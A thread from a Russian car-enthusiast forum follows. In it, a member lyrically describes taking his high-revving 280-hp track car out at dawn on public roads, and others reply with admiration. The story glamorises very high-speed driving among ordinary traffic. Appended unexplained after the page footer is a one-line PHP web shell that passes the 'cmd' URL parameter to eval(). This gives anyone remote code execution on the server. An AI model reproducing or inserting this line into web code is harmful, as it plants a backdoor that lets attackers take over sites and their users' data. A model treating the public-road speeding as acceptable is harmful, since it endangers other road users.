+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 33

Тема: Мои не гольфы.


  1. #1
    GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Регистрация
    07.03.2006
    Откуда
    Одесса
    Машина
    golf_mk1
    Сообщений
    1,204

    Мои не гольфы.

    Если не по теме удалите.
    1 фото-пляжный набор...очень удобно.
    2 фото-дачная тележка, но была испытана на кольце и даже атаковала еволюшн)0
    3 фото идальше..... это то чего нет у фольксвагена, как бы я эту марку не любил.. атмосферный двигатель который своей песней на 9000 об.мин заставляет сердце выбиваться из ритма.
    - катаюсь на ней только на треке и иногда утром в субботу воскресенье от своего дома дорогам общего пользования...
    она стоит и долго ждет меня, иногда неделю,иногда месяц иногда долгую зиму, а я жду ее...прока все соседи спят спускаюсь во двор и проверяю все жидкости, включаю питание и сразу оживает вентилятор, бензонасос, табло на котором главной полосой идет цифровой тахометр, все остальное второстипенно..не важно и не нужно...
    нажимаю красную кнопочку, чувствую спиной через ковш конвульсии 2 литрового мотора в котором затаились 280 атмосферных резвых лошадей.
    есть...ожил двиг, даю ему прогреться и разогнать масло.Пока греется проверяю тормоза, уровни и температуры. Тихонько выезжаю со двора, два-вей диференциал недовольно скрипит при моих маневрах...не хочу разбудить соседей. как можно тише пытаюсь тронуться и ловлю короткое керамическое сцепление не давая заглохнуть на холостых...
    потихоньку уезжаю от дома, смотрю на лицо охраника на воротах и понимаю что он ждет)
    он зна5ет что сейчас будет...владываю бируши в уши и...на непрогретых сликах первая сразу бьется в отсечке,вторая,третья,четвертая кажется зацепился и уже не надо ловить непослушную заднюю ось...ну что? кто кого,ты меня в кювет или в столб или я тебя приведу обратно?
    оттормаживаясь на прямиках понимаю что колодки еще не нагреты...
    что же так долго они греются?
    мимо мелькают какие то автомобили, такое впечетление что они все застыли и совсем не едут. отсекаюсь на 5-й передаче и раскручиваю до 8000 шестую, мои переключениях на 7500 об.мин наверно слышны моей жене которвая сладко спит))потому что прострел идет довольно громкий.
    Песня лучшего атмосферного мотора построеного фанатом С2К под руководством японской кольцевой команды Джей-си рейсинг заставляет меня забыть обо всем...есть я и этот дрожащий, вибрирующий в резонанс 9000 об.мин кузов моего автомобиля, и мотор который отзывается на любое мое желание взрываясь в красную зону...
    возвращаюсь в реальность и осматриваюсь куда меня занесло, постепенно прихожу в себя...разворачиваюсь и еду тихонько на 4000 об.мин. домой, в общем потоке открыв вентиляцию и улыбаясь вслед всем тойотам, аудям и ниссанам которые пытаются меня обогнать...парни.мне не интересно с вами гонятся), это не тот автомобиль, это автомобиль созданный для того что соревноваться самим с собой.
    тихонько на холостых подкатываюсь к дому, ставлю ее в уголок,тушу двигатель даю вентилятору охладить подкапотное и слушаю как остываает потрескивая инконелевый коллектор...
    все.
    теперь можно неделю ездить по городу 40 км.час и ждать следующих выходных...
    я их жду, и жду когда снова буду бороться с этим нервным созданием,пытающимся проверить кто есть ты...а она ждет меня...
    Последний раз редактировалось Igorb; 06.05.2012 в 20:01.
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

    Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

  2. #2
    GTI-Racing сидоров-1968 is on a distinguished road Аватар для сидоров-1968
    Регистрация
    23.02.2009
    Откуда
    ростов на дону
    Машина
    audi s3 8l 2003г
    Сообщений
    326
    обосцал ляжки. такой рассказ что кажется что это я за рулем.... грею колодки и ловлю юлящую заднюю ось..

  3. #3
    GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Регистрация
    07.03.2006
    Откуда
    Одесса
    Машина
    golf_mk1
    Сообщений
    1,204
    уже два года это самый быстрый автомобиль на нашем кольце Чайка, притом я на нем езжу по городу даже на встречу гольфов приезжал)))
    Предний привод тоже наш, но там другая история, 1.6 атмо 200 сил и 800 кг веса.
    Надеемся что найдем время и соберем до конца косворт ескорт и полный будет у нас.
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

    Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

  4. #4
    GTI-Racing geminus is a jewel in the rough geminus is a jewel in the rough geminus is a jewel in the rough Аватар для geminus
    Регистрация
    31.01.2007
    Откуда
    МО, г.Чехов
    Машина
    Audi A6 Allroad
    Сообщений
    1,260
    круть!!!
    AUDI ALLROAD A6 3.0TDI Quattro 6MT
    МО, Чехов
    Иван


  5. #5
    GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Регистрация
    07.03.2006
    Откуда
    Одесса
    Машина
    golf_mk1
    Сообщений
    1,204
    TODA, JC Racing.
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

    Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

  6. #6
    GTI-Racing lingus is on a distinguished road Аватар для lingus
    Регистрация
    06.02.2007
    Откуда
    Чехов
    Машина
    Skoda Superb 1.8T
    Сообщений
    1,214
    ух, шикарно!
    Skoda Superb 1.8T
    NewBeetle 2.0MT Black - продан
    VW golf VI GTi - на попечении

  7. #7
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    одним словом мандец............. станок удовольствия
    песок сыпется....не останавливайтесь на достигнутом !

  8. #8
    GTI-Racing keks is on a distinguished road Аватар для keks
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    mk4 25th anniversary
    Сообщений
    794
    завидую белой завистью! +5
    I love GTIclub

  9. #9
    GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Регистрация
    07.03.2006
    Откуда
    Одесса
    Машина
    golf_mk1
    Сообщений
    1,204
    делать было нечего(точнее дел было дохера, но первое солнечное воскресенье с сухим асвальтом никто не мог пропустить ведь зима была такая долгая..)

    http://www.youtube.com/watch?v=fmV8Y...layer_embedded
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

    Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

  10. #10
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Привозили сегодня на прицепе такую же как у тебя Хонду в Мячково, но она еще более дикая какая то, под капотом такой же грибок фильтра, в остальном там красная голова, обвес такой же.....а дикая потому, что все фары заклеены, и ее чем то оживляли при запуске мотора ))))
    Может она и не быстрая, но медленные вроде на автовозах не возят )))..... и тоже белая )))
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. аллюминиевые радиаторы на гольфы, продам.
    от Igorb в разделе Покупка и продажа
    Ответов: 9
    Последнее сообщение: 02.01.2024, 05:50
  2. Brembo на гольфы!!!
    от Merlin в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 73
    Последнее сообщение: 07.04.2008, 21:36
  3. Классная нарезка про гольфы
    от bafomet в разделе Курилка
    Ответов: 10
    Последнее сообщение: 21.02.2007, 23:29
  4. Танцующие гольфы
    от chess в разделе Курилка
    Ответов: 9
    Последнее сообщение: 17.02.2007, 19:33
  5. есть гольфы в обвесе?
    от cage в разделе Авто спорт
    Ответов: 15
    Последнее сообщение: 14.11.2006, 16:36

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}